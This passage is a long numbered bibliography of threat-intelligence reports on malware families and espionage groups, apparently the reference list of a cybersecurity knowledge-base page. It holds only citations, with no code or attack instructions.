  45. Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.
  46. Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020.
  47. Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020.
  48. Grunzweig, J. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.
  49. McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.
  50. Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020.
  51. Microsoft. (2012, November 14). Certutil. Retrieved July 3, 2017.
  52. LOLBAS. (n.d.). Certutil.exe. Retrieved July 31, 2019.
  53. Miller-Osborn, J. and Grunzweig, J. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
  54. Nakamura, Y. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.
  55. FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
  56. Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020.
  57. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
  58. Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
  59. The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.
  60. Alperovitch, D. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
  61. F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
  62. Microsoft. (n.d.). Copy. Retrieved April 26, 2016.
  63. Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.
  64. Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.
  65. Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.
  66. Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019.
  67. Chen, Y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved July 22, 2020.
  68. FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
  69. Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.
  70. Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.
  71. Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.
  72. TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018.
  73. Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.
  74. Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.
  75. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
  76. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
  77. Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.
  78. Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.
  79. ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
  80. US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.
  81. US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.
  82. NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
  83. Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.
  84. Ladley, F. (2012, May 15). Backdoor.Ritsol. Retrieved February 23, 2018.
  85. Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 14, 2018.
  86. Falcone, R. and Miller-Osborn, J. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.
  87. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
  88. LOLBAS. (n.d.). Esentutl.exe. Retrieved September 3, 2019.
  89. Marschalek, M. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.
  90. Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.
  91. Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.
  92. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
  93. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.
  94. Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
  95. Department of Justice. (2018, August 01). HOW FIN7 ATTACKED AND STOLE DATA. Retrieved August 24, 2018.
  96. Kizhakkinan, D., et al. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.
  97. Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.
  98. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
  99. Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.
  100. Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.
  101. ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.
  102. Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.
  103. Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.
  104. Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020.
  105. Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.
  106. Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020.
  107. Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.
  108. Reynolds, J. (2016, September 14). H1N1: Technical analysis reveals new capabilities – part 2. Retrieved September 26, 2016.
  109. Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020.
  110. Falcone, R. and Lee, B. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
  111. Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.
  112. Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.
  113. US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.
  114. Knight, S. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020.
  115. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
  116. Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.
  117. Lelli, A. (2010, January 11). Trojan.Hydraq. Retrieved February 20, 2018.
  118. Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
  119. Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020.
  120. Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.
  121. Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.
  122. Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.
  123. Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019.
  124. ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.
  125. Lee, B., et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.
  126. Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
  127. Sharma, R. (2018, August 15). Revamped jRAT Uses New Anti-Parsing Techniques. Retrieved September 21, 2018.
  128. Kamluk, V. & Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.
  129. Bingham, J. (2013, February 11). Cross-Platform Frutas RAT Builder and Back Door. Retrieved April 23, 2019.
  130. Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.
  131. Levene, B., et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.
  132. Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.
  133. Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.
  134. US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.
  135. Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.
  136. Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
  137. Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.
  138. Moench, B. and Aboud, E. (2016, August 23). Trojan.Kwampirs. Retrieved May 10, 2018.
  139. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
  140. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.
  141. Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.
  142. Axel F., Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
  1. Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.
  2. Zhou, R. (2012, May 15). Backdoor.Linfo. Retrieved February 23, 2018.
  3. Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020.
  4. FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.
  5. ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.
  6. Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
  7. Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018.
  8. Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.
  9. Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.
  10. PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.
  11. United States District Court Southern District of New York (USDC SDNY). (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.
  12. Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.
  13. Sierra, E., Iglesias, G. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.
  14. Zhang, X. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020.
  15. Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018.
  16. Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.
  17. Kaspersky Lab's Global Research & Analysis Team. (2013, February 27). The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor. Retrieved April 5, 2017.
  18. Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.
  19. Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.
  20. Stama, D. (2015, February 6). Backdoor.Mivast. Retrieved February 15, 2016.
  21. GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.
  22. Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.
  23. Villadsen, O. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
  24. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
  25. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
  26. ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
  27. Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.
  28. The DigiTrust Group. (2017, January 01). NanoCore Is Not Your Average RAT. Retrieved November 9, 2018.
  29. Kasza, A., Halfpop, T. (2016, February 09). NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails. Retrieved November 9, 2018.
  30. Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018.
  31. Szappanos, G., Brandt, A. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020.
  32. Sponchioni, R. (2016, March 11). Backdoor.Nidiran. Retrieved August 3, 2016.
  33. Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: "njRAT" Uncovered. Retrieved June 4, 2019.
  34. Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.
  35. Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.
  36. Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.
  37. Sardiwal, M., et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
  38. Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.
  39. Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.
  40. Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.
  41. Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018.
  42. Mullaney, C. & Honda, H. (2012, May 4). Trojan.Pasam. Retrieved February 22, 2018.
  43. Kaspersky Lab's Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.
  44. Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti Group. Retrieved August 24, 2020.
  45. Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.
  46. Kaplan, D., et al. (2017, June 7). PLATINUM continues to evolve, find ways to maintain invisibility. Retrieved February 19, 2018.
  47. Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.
  48. Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018.
  49. Mercer, W., et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020.
  50. Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.
  51. hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.
  52. Dunwoody, M. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
  53. Adair, S. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.
  54. Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
  55. Singh, S., et al. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
  56. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
  57. Gorelik, M. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.
  58. Nicolas Verdier. (n.d.). Retrieved January 29, 2018.
  59. MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.
  60. Meltzer, M., et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.
  61. Aquino, M. (2013, June 13). RARSTONE Found In Targeted Attacks. Retrieved December 17, 2015.
  62. Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.
  63. Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.
  64. Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.
  65. PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.
  66. Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.
  67. Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.
  68. Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016.
  69. Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016.
  70. Livelli, K., et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019.
  71. Cadieux, P., et al. (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.
  72. McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.
  73. Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.
  74. Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.
  75. Liebenberg, D. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.
  76. Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.
  77. Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019.
  78. Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.
  79. Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020.
  80. Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.
  81. Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.
  82. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
  83. Cherepanov, A. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.
  84. Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.
  85. Grunzweig, J. (2015, July 14). Unit 42 Technical Analysis: Seaduke. Retrieved August 3, 2016.
  86. Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.
  87. Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.
  88. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.
  89. Falcone, R. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.
  90. Sherstobitoff, R., Malhotra, A., et al. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.
  91. Lunghi, D. and Horejsi, J. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.
  92. Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.
  93. Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020.
  94. Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.
  95. Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018.
  96. Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019.
  97. CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020.
  98. National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.
  99. Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.
  100. Platt, J. and Reeves, J. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019.
  101. Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.
  102. Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
  103. FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.
  104. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.
  105. Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019.
  106. ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.
  107. Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.
  108. Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.
  109. Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.
  110. Chen, J. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.
  111. Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.
  112. ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018.
  113. O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.
  114. US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.
  115. Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.
  116. Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.
  117. Trend Micro. (2014, December 11). PE_URSNIF.A2. Retrieved June 5, 2019.
  118. Sioting, S. (2013, June 15). BKDR_URSNIF.SM. Retrieved June 5, 2019.
  119. Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.
  120. Salem, E., et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE. Retrieved June 19, 2020.
  121. Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018.
  122. GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.
  123. Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018.
  124. US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.
  125. US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.
  126. Yagi, J. (2014, August 24). Trojan.Volgmer. Retrieved July 16, 2018.
  127. Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.
  128. CISA. (2020, July 16). MAR-10296782-3.v1 – WELLMAIL. Retrieved September 29, 2020.
  129. PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.
  130. CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020.
  131. Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020.
  132. Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.
  133. Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.
  134. S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.
  135. Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.
  136. Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.
  137. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
  138. ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
  139. Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018.
  140. Ebach, L. (2017, June 22). Analysis Results of Zeus.Variant.Panda. Retrieved November 5, 2018.
  141. Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.
  142. Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.